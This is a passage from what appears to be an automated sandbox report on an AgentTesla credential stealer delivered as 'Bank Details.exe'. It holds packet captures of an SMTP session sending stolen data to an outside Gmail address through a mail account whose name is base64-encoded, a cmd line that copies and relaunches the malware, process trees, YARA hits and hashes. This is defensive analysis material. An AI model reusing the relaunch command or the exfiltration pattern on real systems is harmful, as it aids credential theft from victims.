                                                          Aug 29, 2024 12:19:15.429685116 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:15.434890032 CEST49722587192.168.2.9193.141.65.39
                                                          Aug 29, 2024 12:19:15.439805031 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:15.703665018 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:15.736875057 CEST49722587192.168.2.9193.141.65.39
                                                          Aug 29, 2024 12:19:15.736943007 CEST49722587192.168.2.9193.141.65.39
                                                          Aug 29, 2024 12:19:15.736972094 CEST49722587192.168.2.9193.141.65.39
                                                          Aug 29, 2024 12:19:15.736988068 CEST49722587192.168.2.9193.141.65.39
                                                          Aug 29, 2024 12:19:15.741775036 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:15.741789103 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:15.741873026 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:15.741882086 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:16.238709927 CEST58749722193.141.65.39192.168.2.9
                                                          Aug 29, 2024 12:19:16.284197092 CEST49722587192.168.2.9193.141.65.39

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Aug 29, 2024 12:19:02.335957050 CEST5274353192.168.2.91.1.1.1
                                                          Aug 29, 2024 12:19:02.539005995 CEST53527431.1.1.1192.168.2.9

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Aug 29, 2024 12:19:02.335957050 CEST192.168.2.91.1.1.10xcf26Standard query (0)mail.azmaplast.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Aug 29, 2024 12:19:02.539005995 CEST1.1.1.1192.168.2.90xcf26No error (0)mail.azmaplast.com193.141.65.39A (IP address)IN (0x0001)false

                                                          SMTP Packets

                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                          Aug 29, 2024 12:19:13.055720091 CEST58749722193.141.65.39192.168.2.9220 lh222.irandns.com ESMTP Exim 4.98 Thu, 29 Aug 2024 13:49:12 +0330
                                                          Aug 29, 2024 12:19:13.059863091 CEST49722587192.168.2.9193.141.65.39EHLO 571345
                                                          Aug 29, 2024 12:19:13.329261065 CEST58749722193.141.65.39192.168.2.9250-lh222.irandns.com Hello 571345 [8.46.123.33]
                                                          250-SIZE 52428800
                                                          250-LIMITS MAILMAX=100 RCPTMAX=150
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-PIPECONNECT
                                                          250-AUTH PLAIN LOGIN
                                                          250-STARTTLS
                                                          250 HELP
                                                          Aug 29, 2024 12:19:13.332212925 CEST49722587192.168.2.9193.141.65.39AUTH login aW5mb0Bhem1hcGxhc3QuY29t
                                                          Aug 29, 2024 12:19:13.601562977 CEST58749722193.141.65.39192.168.2.9334 UGFzc3dvcmQ6
                                                          Aug 29, 2024 12:19:13.889111042 CEST58749722193.141.65.39192.168.2.9235 Authentication succeeded
                                                          Aug 29, 2024 12:19:13.889527082 CEST49722587192.168.2.9193.141.65.39MAIL FROM:<info@azmaplast.com>
                                                          Aug 29, 2024 12:19:14.158946037 CEST58749722193.141.65.39192.168.2.9250 OK
                                                          Aug 29, 2024 12:19:14.159256935 CEST49722587192.168.2.9193.141.65.39RCPT TO:<blessedpeter001@gmail.com>
                                                          Aug 29, 2024 12:19:15.429685116 CEST58749722193.141.65.39192.168.2.9250 Accepted
                                                          Aug 29, 2024 12:19:15.434890032 CEST49722587192.168.2.9193.141.65.39DATA
                                                          Aug 29, 2024 12:19:15.703665018 CEST58749722193.141.65.39192.168.2.9354 Enter message, ending with "." on a line by itself
                                                          Aug 29, 2024 12:19:15.736988068 CEST49722587192.168.2.9193.141.65.39.
                                                          Aug 29, 2024 12:19:16.238709927 CEST58749722193.141.65.39192.168.2.9250 OK id=1sjcFH-0000000G8Ll-2Pa2

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:06:15:56
                                                          Start date:29/08/2024
                                                          Path:C:\Users\user\Desktop\Bank Details.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Bank Details.exe"
                                                          Imagebase:0xc50000
                                                          File size:1'201'152 bytes
                                                          MD5 hash:99484DD2AEBFF67B20E11B5AF574A8BE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1711519526.000000000368B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1713067974.0000000004702000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1713067974.0000000004702000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1711519526.0000000003434000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1715433973.0000000006550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1713067974.0000000004407000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1713067974.0000000004407000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1713067974.0000000004407000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1711519526.0000000003341000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1713067974.0000000004529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1713067974.0000000004529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1713067974.0000000004529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:06:16:31
                                                          Start date:29/08/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"cmd" /c ping 127.0.0.1 -n 41 > nul && copy "C:\Users\user\Desktop\Bank Details.exe" "C:\Users\user\Desktop\udo.exe" && ping 127.0.0.1 -n 41 > nul && "C:\Users\user\Desktop\udo.exe"
                                                          Imagebase:0xc50000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:9
                                                          Start time:06:16:31
                                                          Start date:29/08/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:10
                                                          Start time:06:16:31
                                                          Start date:29/08/2024
                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:ping 127.0.0.1 -n 41
                                                          Imagebase:0x250000
                                                          File size:18'944 bytes
                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:06:17:11
                                                          Start date:29/08/2024
                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:ping 127.0.0.1 -n 41
                                                          Imagebase:0x250000
                                                          File size:18'944 bytes
                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:06:17:51
                                                          Start date:29/08/2024
                                                          Path:C:\Users\user\Desktop\udo.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\udo.exe"
                                                          Imagebase:0x720000
                                                          File size:1'201'152 bytes
                                                          MD5 hash:99484DD2AEBFF67B20E11B5AF574A8BE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000010.00000002.3840250798.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3840250798.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3840250798.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000010.00000002.3840250798.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3840250798.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3840250798.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000010.00000002.3825194798.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 55%, ReversingLabs
                                                          • Detection: 43%, Virustotal, Browse
                                                          Reputation:low
                                                          Has exited:false

                                                          General

                                                          Target ID:17
                                                          Start time:06:18:25
                                                          Start date:29/08/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                          Imagebase:0x360000
                                                          File size:42'064 bytes
                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2877661003.0000000000732000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.2877661003.0000000000732000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:18
                                                          Start time:06:18:27
                                                          Start date:29/08/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                          Imagebase:0x780000
                                                          File size:42'064 bytes
                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.3823957553.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.3823957553.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.3823957553.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.3823957553.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:20
                                                          Start time:06:19:11
                                                          Start date:29/08/2024
                                                          Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                                          Imagebase:0x420000
                                                          File size:42'064 bytes
                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          • Detection: 0%, Virustotal, Browse
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:21
                                                          Start time:06:19:11
                                                          Start date:29/08/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:22
                                                          Start time:06:19:19
                                                          Start date:29/08/2024
                                                          Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                                          Imagebase:0xe80000
                                                          File size:42'064 bytes
                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:23
                                                          Start time:06:19:19
                                                          Start date:29/08/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:19.1%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:7.3%
                                                            Total number of Nodes:41
                                                            Total number of Limit Nodes:3
                                                            execution_graph 46030 7cd1848 46031 7cd1872 46030->46031 46035 7cd879b 46031->46035 46040 7cd87a0 46031->46040 46032 7cd700c 46045 7cd8bfc 46035->46045 46051 7cd8913 46035->46051 46056 7cd8918 46035->46056 46036 7cd87ba 46036->46032 46041 7cd87ba 46040->46041 46042 7cd8bfc DeleteFileW 46040->46042 46043 7cd8918 DeleteFileW 46040->46043 46044 7cd8913 DeleteFileW 46040->46044 46041->46032 46042->46041 46043->46041 46044->46041 46046 7cd8c0b 46045->46046 46047 7cd8b9c 46045->46047 46046->46036 46061 7cd9008 46047->46061 46065 7cd8ffb 46047->46065 46048 7cd8bca 46048->46036 46052 7cd892f 46051->46052 46054 7cd9008 DeleteFileW 46052->46054 46055 7cd8ffb DeleteFileW 46052->46055 46053 7cd8bca 46053->46036 46054->46053 46055->46053 46057 7cd892f 46056->46057 46059 7cd9008 DeleteFileW 46057->46059 46060 7cd8ffb DeleteFileW 46057->46060 46058 7cd8bca 46058->46036 46059->46058 46060->46058 46062 7cd901f 46061->46062 46069 7cd0194 46062->46069 46066 7cd9008 46065->46066 46067 7cd0194 DeleteFileW 46066->46067 46068 7cd92cc 46067->46068 46068->46048 46070 7cd9368 DeleteFileW 46069->46070 46072 7cd92cc 46070->46072 46072->46048 46073 817a230 46074 817a3bb 46073->46074 46075 817a256 46073->46075 46075->46074 46078 817a4b0 PostMessageW 46075->46078 46080 817a4af 46075->46080 46079 817a51c 46078->46079 46079->46075 46081 817a4b0 PostMessageW 46080->46081 46082 817a51c 46081->46082 46082->46075

                                                            Executed Functions

                                                            Function 07D411B3 Relevance: 5.5, Instructions: 5504COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 7d411b3-7d413f7 29 7d4345d-7d4370b 0->29 30 7d413fd-7d42110 0->30 97 7d445f0-7d4558a 29->97 98 7d43711-7d445e8 29->98 429 7d42116-7d42488 30->429 430 7d42490-7d43455 30->430 659 7d45910-7d45923 97->659 660 7d45590-7d45908 97->660 98->97 429->430 430->29 664 7d45f65-7d46df7 659->664 665 7d45929-7d45f5d 659->665 660->659 1048 7d46df7 call 7d489b0 664->1048 1049 7d46df7 call 7d4897d 664->1049 1050 7d46df7 call 7d489ab 664->1050 665->664 1046 7d46dfd-7d46e04 1048->1046 1049->1046 1050->1046
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 942c03c468c47cdc8bcc067a0a83083a94b6229d37c6242107ff024324b94dde
                                                            • Instruction ID: a29394495da63b684b4e91a07f74cec7935f4583a75816bfbb85ebd67f5cbcfb
                                                            • Opcode Fuzzy Hash: 942c03c468c47cdc8bcc067a0a83083a94b6229d37c6242107ff024324b94dde
                                                            • Instruction Fuzzy Hash: E0B33574A016188BCB18EF38D9896ACBBB2FF89310F4095E9D489A3350DF385E94DF55
                                                            Function 07D411C0 Relevance: 5.5, Instructions: 5499COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1051 7d411c0-7d413f7 1079 7d4345d-7d4370b 1051->1079 1080 7d413fd-7d42110 1051->1080 1147 7d445f0-7d4558a 1079->1147 1148 7d43711-7d445e8 1079->1148 1479 7d42116-7d42488 1080->1479 1480 7d42490-7d43455 1080->1480 1709 7d45910-7d45923 1147->1709 1710 7d45590-7d45908 1147->1710 1148->1147 1479->1480 1480->1079 1714 7d45f65-7d46df7 1709->1714 1715 7d45929-7d45f5d 1709->1715 1710->1709 2098 7d46df7 call 7d489b0 1714->2098 2099 7d46df7 call 7d4897d 1714->2099 2100 7d46df7 call 7d489ab 1714->2100 1715->1714 2096 7d46dfd-7d46e04 2098->2096 2099->2096 2100->2096
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec0e6b6572663c5dd60fb7e6c0103988bcd388e795646ed6cda56eb25dc623e9
                                                            • Instruction ID: 58d7b66549a90afeb2c316cbbca028b884f82a4508e0a7e1cd91a82f86b22566
                                                            • Opcode Fuzzy Hash: ec0e6b6572663c5dd60fb7e6c0103988bcd388e795646ed6cda56eb25dc623e9
                                                            • Instruction Fuzzy Hash: 9DB33574A016188BCB18EF38D9896ACBBB2FF89310F4095E9D489A3350DF385E94DF55
                                                            Function 07CD1848 Relevance: 5.2, Instructions: 5237COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3057 7cd1848-7cd7004 call 7cd7e50 4010 7cd7006 call 7cd879b 3057->4010 4011 7cd7006 call 7cd87a0 3057->4011 4009 7cd700c-7cd7013 4010->4009 4011->4009
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1718362178.0000000007CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7cd0000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3cec35c89eac199b6f25b323e4ffd403af87ac5e94c3626b5f2ecca1727fb96f
                                                            • Instruction ID: d0cca26e8cdd9bb5c87a754ab80923ef95c2533994ac663e0377ba46357a9bf1
                                                            • Opcode Fuzzy Hash: 3cec35c89eac199b6f25b323e4ffd403af87ac5e94c3626b5f2ecca1727fb96f
                                                            • Instruction Fuzzy Hash: 75B3F974A012198FCB18AF38D9896ACBBF2FF89300F4095E9D489A3251DF345E94DF95
                                                            Function 08175AA0 Relevance: 3.2, Instructions: 3180COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4013 8175aa0-8175acc 4015 8175ae0-8175bc5 4013->4015 4016 8175ace-8175adb 4013->4016 4019 8175bc7-8175bce 4015->4019 4016->4019 4021 8175cb5-8175d6d 4019->4021 4022 8175bd4-8175cae 4019->4022 4056 8176010-8176021 4021->4056 4022->4021 4058 8176027-8176038 call 8179aeb 4056->4058 4059 8175d72-8175d7b 4056->4059 4074 817603f-8176046 4058->4074 4061 8175d81-8175d98 4059->4061 4062 817604c-81760ce 4059->4062 4069 8175d9e 4061->4069 4070 8175f6c-817600e 4061->4070 4076 8176110-8176129 4062->4076 4077 81760d0-81760f4 4062->4077 4075 8175da5-8175f4f 4069->4075 4070->4056 4108 8176047 4070->4108 4075->4070 4143 8175f51-8175f59 4075->4143 4079 817612a-8176150 4076->4079 4078 81760f6-817610f 4077->4078 4077->4079 4078->4076 4081 81761c6-817638d 4079->4081 4082 8176152 4079->4082 4141 81763a1-8176792 call 81753d0 4081->4141 4142 817638f-817639a 4081->4142 4085 8176156-8176189 4082->4085 4085->4085 4087 817618b-81761c1 4085->4087 4087->4081 4108->4062 4199 8179453-8179470 4141->4199 4200 8176798-81789b2 4141->4200 4142->4141 4143->4070 4203 8179471-8179472 4199->4203 4200->4199 4204 8179474-81794c6 4203->4204 4205 81794c8-81794e4 4203->4205 4204->4205 4205->4203 4207 81794e6-8179526 4205->4207
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719979221.0000000008170000.00000040.00000800.00020000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8170000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99d1c2392242adbdeab17e2cd1a0699a8bb9ca659ece74fb13f45250118d883a
                                                            • Instruction ID: bc9ce39f793f1038269387ec04d18603d5cbb3941cfecf217fd5692b0c146e1a
                                                            • Opcode Fuzzy Hash: 99d1c2392242adbdeab17e2cd1a0699a8bb9ca659ece74fb13f45250118d883a
                                                            • Instruction Fuzzy Hash: 8A438AB0A05218CBCB04AF79D8886ADBFB1EF89700F4085EDD589A3251DF385D89DF65
                                                            Function 07D4D730 Relevance: 1.7, Strings: 1, Instructions: 434COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 4627 7d4d730-7d4d76e 4628 7d4d770-7d4d777 4627->4628 4629 7d4d793-7d4d7b0 call 7d4cbe8 4627->4629 4630 7d4e02d-7d4e038 4628->4630 4631 7d4d77d-7d4d788 4628->4631 4636 7d4d7b2-7d4d7b8 4629->4636 4637 7d4d7bb-7d4d7cc 4629->4637 4639 7d4e03f-7d4e0b3 4630->4639 4631->4629 4636->4637 4640 7d4d7d2-7d4d7e2 call 7d4cc48 4637->4640 4641 7d4d87a-7d4d89d 4637->4641 4687 7d4e0ba-7d4e126 4639->4687 4646 7d4d7e4-7d4d7fd 4640->4646 4647 7d4d83f-7d4d842 4640->4647 4648 7d4d8a3-7d4d8b0 4641->4648 4649 7d4daea-7d4db17 4641->4649 4661 7d4d803-7d4d808 4646->4661 4662 7d4e12d-7d4e13a 4646->4662 4651 7d4d844-7d4d84b 4647->4651 4652 7d4d850-7d4d862 4647->4652 4648->4649 4657 7d4d8b6-7d4d8bc 4648->4657 4658 7d4dbfd-7d4dc23 call 7d4cce8 4649->4658 4659 7d4db1d-7d4db2b 4649->4659 4651->4649 4652->4662 4667 7d4d868-7d4d875 4652->4667 4664 7d4d8c2-7d4d8ce 4657->4664 4665 7d4d8be-7d4d8c0 4657->4665 4669 7d4dc28 4658->4669 4659->4658 4674 7d4db31-7d4db3e 4659->4674 4661->4649 4668 7d4d80e-7d4d83a 4661->4668 4670 7d4d8d0-7d4d8df 4664->4670 4665->4670 4667->4649 4668->4649 4673 7d4e01e-7d4e025 4669->4673 4670->4639 4682 7d4d8e5-7d4d8e9 4670->4682 4684 7d4db44-7d4db47 4674->4684 4685 7d4e028 4674->4685 4686 7d4d8ef-7d4d8f6 4682->4686 4682->4687 4684->4685 4688 7d4db4d-7d4db6a 4684->4688 4685->4630 4686->4687 4690 7d4d8fc-7d4d903 4686->4690 4687->4662 4705 7d4db6c-7d4db72 4688->4705 4706 7d4dbad-7d4dbd7 4688->4706 4692 7d4d9f8-7d4d9ff 4690->4692 4693 7d4d909-7d4d910 4690->4693 4692->4649 4698 7d4da05-7d4da29 4692->4698 4693->4662 4699 7d4d916-7d4d931 4693->4699 4707 7d4da62-7d4da76 4698->4707 4708 7d4da2b-7d4da31 4698->4708 4709 7d4d937-7d4d951 4699->4709 4710 7d4d933-7d4d935 4699->4710 4705->4662 4712 7d4db78-7d4db7e 4705->4712 4706->4673 4740 7d4dbdd-7d4dbe9 4706->4740 4725 7d4da78 4707->4725 4726 7d4da7a-7d4da86 4707->4726 4713 7d4da37-7d4da43 4708->4713 4714 7d4da33-7d4da35 4708->4714 4711 7d4d953-7d4d961 4709->4711 4710->4711 4718 7d4d986-7d4d9b6 4711->4718 4719 7d4d963-7d4d972 4711->4719 4722 7d4db80-7d4db83 4712->4722 4723 7d4db91-7d4db99 4712->4723 4715 7d4da45-7d4da4e 4713->4715 4714->4715 4715->4707 4738 7d4da50-7d4da60 4715->4738 4719->4718 4739 7d4d974-7d4d984 4719->4739 4722->4662 4727 7d4db89-7d4db8f 4722->4727 4728 7d4dba0-7d4dba3 4723->4728 4735 7d4da88-7d4da9a 4725->4735 4726->4735 4727->4728 4728->4685 4737 7d4dba9-7d4dbab 4728->4737 4745 7d4dad4-7d4dae7 4735->4745 4737->4705 4737->4706 4738->4707 4750 7d4da9c-7d4dad2 4738->4750 4739->4718 4752 7d4d9b9-7d4d9f5 4739->4752 4740->4658 4753 7d4dbeb 4740->4753 4750->4745 4753->4673
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1719120466.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7d40000_Bank Details.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ]
                                                            • API String ID: 0-3352871620
                                                            • Opcode ID: b1b617e87a8b5f6dfc7946f7e557a9e1ac41924bda9182bd723d5d963b56546e
                                                            • Instruction ID: 897292bd71afb2267a70b62908c84169d539fe2d6fb48c3b39a0b594a89409c5
                                                            • Opcode Fuzzy Hash: b1b617e87a8b5f6dfc7946f7e557a9e1ac41924bda9182bd723d5d963b56546e
                                                            • Instruction Fuzzy Hash: E1F13D75B00219DFDB14DF24D954BAEB7B3BF89210F148099D949AB3A5CB31DC81CBA1
                                                            Function 017D6CD0 Relevance: 1.0, Instructions: 1018COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1711097006.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
